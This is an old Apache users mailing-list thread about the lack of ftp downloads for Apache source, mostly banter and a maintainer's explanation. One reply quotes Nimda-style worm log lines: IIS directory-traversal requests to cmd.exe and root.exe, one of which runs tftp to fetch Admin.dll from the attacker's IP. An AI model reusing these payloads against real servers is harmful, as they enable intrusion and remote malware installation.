Posted to users@httpd.apache.org by Herb Peyerl <hp...@beer.org> on 2002/02/28 18:13:16 UTC

minor vent.

I felt the need to have a little vent.  If you're not in the mood,
just disregard this post.

So lets say you're in a colo facility, sitting on the floor in
front of your webserver and you find yourself needing to upgrade
Apache.  Since you were out at the bar when your pager went off,
you only have your HP Jornada 720 running NetBSD so you only have
a teeny annoying text display.  You ssh into your webserver and
decide to get the source for Apache.  You type "ftp ftp.apache.org"
since it only makes sense, except you find you get a connection
refused.  Now, given that you're already predisposed to being
highly annoyed in the first place, this doesn't help much.

Now you have to bring up a web browser of some sort, follow a
few links and get the  URL for the source file, then quit and
use wget or lukemftp to retrieve the source file, or some other
variation of the above machinations.

Sure, I could probably build lynx on my webserver but in general,
why should I have to build a piece of software in order to
retrieve the source to Apache when every reasonable operating
system comes with a decent ftp client, and there are a lot of
relatively decent ftpd's that you folks could use?

It's the Principle of Least Surprise at work here.

There. I've had my say.  I'll just go back to being an old
stubborn fart who should have retired years ago.

(I'm going to unsub from this mailing list now, so if you feel
the need to vent back at me, please do it privately, so as
not to pollute this fine mailing list anymore than necessary).

Thanks for listening.

Re: minor vent.

Posted by Lewis Watson <li...@visionsix.com>.
Will that be Visa or Mastercard? <G!>

Posted by Kevin Traas <ke...@merilus.com>.
What about a simple, easy-to-remember URL that can be used with wget?

i.e.

wget http://httpd.apache.org/apache-latest.tar.gz

???

And, of course, this tarball would extract out to a subdir with the version
# as part of it - as per normal....

Regards,
Kevin Traas
Chief Information Officer, Co-founder
Merilus, Inc.     ---=== www.merilus.com  ===---

Re: minor vent.

Posted by Bill -OSX- Jones <sn...@mac.com>.
OMG!  Is *this* an IIS mailing list ?!?
(... sounds of me packing and leaving soonest ...)

-Sx-  :]

On Thursday, February 28, 2002, at 01:08  PM, Daniel Giovannoni wrote:

> Is there a better alternative???
>
> I know this is prolly opening a can of worms here, but really I haven't
> heard of any IIS mailing lists - especially not ones that offer this
> much assistance, whaddya gonna do call MS Tech Support...
>
> Dan

_Sx____________________
  ('>    -Sx- IUDICIUM
  //\   Have Computer -
  v_/_    Will Hack...

RE: minor vent.

Re: minor vent.

Posted by Bill -OSX- Jones <sn...@mac.com>.
who said *we* trust *you*  <Grin>

RE: minor vent (& a little nimda)

Posted by Daniel G <te...@ct5.com>.
See, Herb you could be sitting on the floor of your colo dealing with
poop like this...

Here's an example -

207.86.144.105 - - [28/Feb/2002:02:38:32 -0500] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 200 1942 "-" "-"

... 72 practically identical lines deleted ...

207.86.144.105 - - [28/Feb/2002:02:38:36 -0500] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20207.86.144.105
%20GET%20Admin.
dll%20d:\Admin.dll HTTP/1.0" 200 2104 "-" "-"
207.86.144.105 - - [28/Feb/2002:02:38:39 -0500] "GET
/scripts/..%252f../Admin.dll HTTP/1.0" 200 1950 "-" "-"

Aren't ya glad it's Apache now???

Dan

On Thu, 28 Feb 2002, Rodent of Unusual Size wrote:

> Herb Peyerl wrote:
> >
> > (I'm going to unsub from this mailing list now, so if you feel
> > the need to vent back at me, please do it privately, so as
> > not to pollute this fine mailing list anymore than necessary).
>
> It's rather poor form to pollute the forum yourself and then
> duck out of taking the consequences.. <grin>
>
> I'm ccing the list because this *does* come up occasionally.  I
> handle the mail sent to the Foundation's general eddress, so
> it seems appropriate that I speak up.
>
> > Sure, I could probably build lynx on my webserver but in general,
> > why should I have to build a piece of software in order to
> > retrieve the source to Apache when every reasonable operating
> > system comes with a decent ftp client, and there are a lot of
> > relatively decent ftpd's that you folks could use?
>
> There are a number of reasons we have chosen to support HTTP
> only, and not ftp.  Three of those are: security, virtual hosts,
> and security.
>
> If you trust us enough to use our software, why do you choose
> to DIStrust that we have valid reasons for our configuration?
> --
> #ken	P-)}
>
> Ken Coar, Sanagendamgagwedweinini  http://Golux.Com/coar/
>
> "Millennium hand and shrimp!"

Re: minor vent.

Posted by ar...@cosmic.net.au.
That minor whinge isnt worth replying too, doh to late, ive replied:)

Go install something like webalizer which has 5-6 dependcies when
installing on clean/new systesm, thats all good fun especially for first
timers:)

Re: minor vent.

Posted by Rodent of Unusual Size <Ke...@Golux.Com>.